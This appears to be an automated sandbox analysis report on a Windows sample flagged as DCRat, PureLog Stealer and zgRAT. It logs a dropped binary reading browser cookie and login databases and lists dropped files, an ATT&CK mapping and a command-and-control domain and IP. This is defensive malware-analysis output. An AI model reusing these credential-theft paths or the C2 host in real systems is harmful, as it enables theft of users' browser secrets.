                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: serverDll.exe PID: 5300, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: HMhdtzxEHf.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.serverDll.exe.330000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1665452904.000000000650D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1665910452.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1722682939.0000000000332000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ChainbrowserNet\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Memory Compression.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Vss\Writers\Application\upfc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\Videos\System.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainbrowserNet\serverDll.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: HMhdtzxEHf.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.serverDll.exe.330000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ChainbrowserNet\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Memory Compression.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Vss\Writers\Application\upfc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\Videos\System.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainbrowserNet\serverDll.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts241
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		1
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API                                    		1
                                    DLL Side-Loading                                    		11
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop Protocol1
                                    Data from Local System                                    		2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Exploitation for Client Execution                                    		Logon Script (Windows)Logon Script (Windows)2
                                    Obfuscated Files or Information                                    		Security Account Manager157
                                    System Information Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts2
                                    Command and Scripting Interpreter                                    		Login HookLogin Hook1
                                    Software Packing                                    		NTDS351
                                    Security Software Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets1
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts32
                                    Masquerading                                    		Cached Domain Credentials251
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
                                    Virtualization/Sandbox Evasion                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                    Process Injection                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584128 Sample: HMhdtzxEHf.exe Startdate: 04/01/2025 Architecture: WINDOWS Score: 100 82 495112cm.renyash.ru 2->82 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Antivirus detection for URL or domain 2->92 94 14 other signatures 2->94 11 HMhdtzxEHf.exe 3 6 2->11         started        14 System.exe 2->14         started        17 aaHgUfBgYBljMPbLmzgS.exe 2->17         started        19 6 other processes 2->19 signatures3 process4 file5 78 C:\ChainbrowserNet\serverDll.exe, PE32 11->78 dropped 80 xBHgrB3tvHV8NGEL8m...vT5nxGDfikGQwdW.vbe, data 11->80 dropped 21 wscript.exe 1 11->21         started        116 Antivirus detection for dropped file 14->116 118 Multi AV Scanner detection for dropped file 14->118 120 Machine Learning detection for dropped file 14->120 signatures6 process7 signatures8 96 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->96 98 Suspicious execution chain found 21->98 24 cmd.exe 1 21->24         started        process9 process10 26 serverDll.exe 3 39 24->26         started        30 conhost.exe 24->30         started        file11 62 C:\Windows\Vss\Writers\Application\upfc.exe, PE32 26->62 dropped 64 C:\Users\user\Desktop\zkTmQnyh.log, PE32 26->64 dropped 66 C:\Users\user\Desktop\yCaEfIsj.log, PE32 26->66 dropped 68 25 other malicious files 26->68 dropped 100 Antivirus detection for dropped file 26->100 102 Multi AV Scanner detection for dropped file 26->102 104 Machine Learning detection for dropped file 26->104 106 2 other signatures 26->106 32 cmd.exe 26->32         started        34 powershell.exe 26->34         started        37 powershell.exe 23 26->37         started        39 17 other processes 26->39 signatures12 process13 signatures14 41 backgroundTaskHost.exe 32->41         started        58 3 other processes 32->58 86 Loading BitLocker PowerShell Module 34->86 46 conhost.exe 34->46         started        48 WmiPrvSE.exe 34->48         started        50 conhost.exe 37->50         started        52 conhost.exe 39->52         started        54 conhost.exe 39->54         started        56 conhost.exe 39->56         started        60 14 other processes 39->60 process15 dnsIp16 84 495112cm.renyash.ru 104.21.38.84, 49736, 49737, 49738 CLOUDFLARENETUS United States 41->84 70 C:\Users\user\Desktop\zUjwmmDb.log, PE32 41->70 dropped 72 C:\Users\user\Desktop\uhRxJqon.log, PE32 41->72 dropped 74 C:\Users\user\Desktop\sNXxZlqq.log, PE32 41->74 dropped 76 19 other malicious files 41->76 dropped 108 Antivirus detection for dropped file 41->108 